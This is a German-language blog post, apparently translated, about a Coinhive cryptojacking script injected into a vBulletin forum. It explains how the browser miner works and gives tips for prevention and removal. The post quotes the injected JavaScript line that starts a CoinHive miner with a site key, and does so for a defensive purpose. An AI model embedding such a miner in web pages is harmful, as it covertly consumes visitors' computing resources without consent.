So entfernen Sie Coinhive Crypto-Mining-Skript von Ihrer Website

Ich besuche das Forum jeden Tag und habe es am Vortag noch nicht gesehen. Also nehme ich an, dass dies einige Zeit in der Nacht passiert ist, meine Zeit, als ich geschlafen habe.

Ich benutze die vBulletin-Software für das Forum und es wurde auf die neueste Version aktualisiert. Darüber hinaus war dies für uns ziemlich überraschend, da die Domäne von TheWindowsClub.com Sucuri Web Antivirus & Firewall verwendet, um sich vor Online-Internetbedrohungen und Angriffen zu schützen.

Meine PC-Sicherheitssoftware hat die Ausführung des schädlichen Skripts erfolgreich beendet auf meinem Windows 10 Computer. Ich habe mit anderen Browsern wie Chrome & Edge gecheckt und die Ergebnisse waren die gleichen.

Nachdem ich mit der rechten Maustaste auf die Forumswebseite geklickt und den Quellcode überprüft hatte, stellte ich fest, dass es sich um ein bösartiges CryptoMiner-Skript von CoinHive handelte.

Dies ist das bösartige Coinhive Javascript welches in meinen Forencode gekommen ist:

var miner = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();

Wie auch immer, das erste, was ich getan habe, war das forum down und informiere Sucuri.

Die Sucuri-Leute haben das Forum des Coinhive-Skripts geputzt, das in ein paar Stunden in mein Forum geschoben wurde, und alles war in Ordnung.

Was ist CoinHive

Coinhive bietet ein JavaScript-Miner für die Monero-Kryptowährung, den Sie in Ihre Website einbetten können und die CPU von Website-Besuchercomputern nutzen, um Münzen für Sie zu gewinnen.

Dies wird Cryptojacking genannt. Es beinhaltet das Entführen der Browser der Benutzer für das Kryptowährungs-Mining. Einige Websitebetreiber können sie selbst verwenden, um Geld zu verdienen - aber in unserem Fall wurde sie injiziert.

Wenn ein Benutzer auf die infizierte Site zugreift, führt das Coinhive-JavaScript Monero mit den CPU-Ressourcen des Benutzers aus. Dies kann zu einer CPU-Drosselung und einem unerwarteten Systemabsturz des Computers des Opfers führen.

Wenn Ihr Browser infiziert ist, sehen Sie, dass Ihre Ressourcenauslastung steigt. Schließen Sie den Browser und es wird gelöscht. Der Benutzer kann feststellen, dass sich die Maschine aufheizt, der Lüfter schnell läuft oder der Akku schnell leer ist.

Ich habe meinen Kollegen Saurabh Mukhekar gebeten, mein Forum mit seinem Mac zu besuchen. Nun, sein Mac-Computer war auch betroffen, als er das Forum mit Safari eröffnete! Er ist einer dieser schlauen Mac OSX Benutzer, der eine Antivirensoftware für seinen Mac verwendet. Sein Avast Antivirus für Mac verhinderte erfolgreich die Ausführung des bösartigen Skripts.

Said Saurabh,

Die Malware von CoinHive entführt nicht nur einen Windows PC, sondern auch den Mac, da es sich um eine browserbasierte Javascript-Infektion handelt. Es ist gut, ich glaube nicht an den Mythos, dass Macs keine Antivirensoftware benötigen, sonst wäre meine Maschine infiziert worden und mein Mac hätte weiterhin Münzen für jemand anderen ausgegeben.

Verhindern, dass CoinHive Ihre Website infiziert

1. Verwenden Sie keine NULL Templates oder Plugins auf Ihrer Website / Ihrem Forum.
2. Halten Sie Ihr CMS auf dem neuesten Stand.
3. Aktualisieren Sie Ihre Hosting-Software regelmäßig (PHP, Datenbank, etc …).
4. Sichern Sie Ihre Website mit Web Security Anbietern wie Sucuri, Cloudflare, Wordfence, etc.
5. Treffen Sie grundlegende Vorsichtsmaßnahmen, um Ihr Blog zu sichern.

CoinHive Bergmann Entfernung von der Website

Zunächst müssen Sie der Webmaster der sein infizierte Website - oder haben Administratorrechte, die Ihnen Zugriff auf alle Website-Dateien gewähren.

Wenn Ihr Antivirenprogramm die CoinHive-Infektion erkennt, klicken Sie mit der rechten Maustaste auf die Webseite und wählen Sie Quellcode anzeigen. Drücken Sie dann Strg + F und suchen Sie nach "CoinHive".

Sobald Sie den Ort des bösartigen Codes identifiziert haben, müssen Sie seine Position sehen - wo befindet sie sich. Jetzt müssen Sie es manuell entfernen. Um dies zu tun, benötigen Sie ein wenig Programmierkenntnisse Ihrer Plattform. Sie müssen die infizierten Dateien ausfindig machen und das obige Skript manuell entfernen. Wenn Sie sich nicht sicher sind, bitten Sie einen Experten, dies zu tun. Da wir Sucuri verwenden, lassen wir es tun.

Danach löschen Sie Ihren Server & Browser-Cache. Wenn Sie ein Cache-Plugin verwenden oder MaxCDN sagen, löschen Sie auch diese Caches.

Schützen Sie sich vor Krypto-Mining-Skripten

Cryptocurrencies & Blockchain-Technologie erobert die Welt. Es wirkt sich auf die Weltwirtschaft aus und verursacht auch technologische Störungen. Jeder hat begonnen, sich auf einen so lukrativen Markt zu konzentrieren - und dazu gehören auch Website-Hacker. Wenn die Renditen steigen, sollten wir erwarten, dass solche Technologien missbraucht werden. Das ist die dunkle Seite jeder neuen Technologie.

Wir können jederzeit die bestmöglichen Vorkehrungen treffen. Verwenden Sie neben einer guten Sicherheitssoftware eine Chrome- oder Firefox-Erweiterung, die Websites daran hindert, Ihre CPU für die Cryptocurrency-Nutzung zu nutzen - oder noch besser Anti-WebMiner, der Cryptojacking-Mining-Script-Angriffe durch Änderung Ihrer Hosts-Datei stoppt. Es funktioniert auf allen Browsern. Wenn Sie ein Mac-Benutzer sind, sollten Sie sich auch eine Antiviren-Software für Ihren Computer besorgen.

Falls Sie das Gefühl haben, eine infizierte Website besucht zu haben, ist es ratsam, den Browser zu leeren cache und scanne deinen Rechner mit deiner Antiviren-Software sowie AdwCleaner.

Bleib in Sicherheit, bleib wach!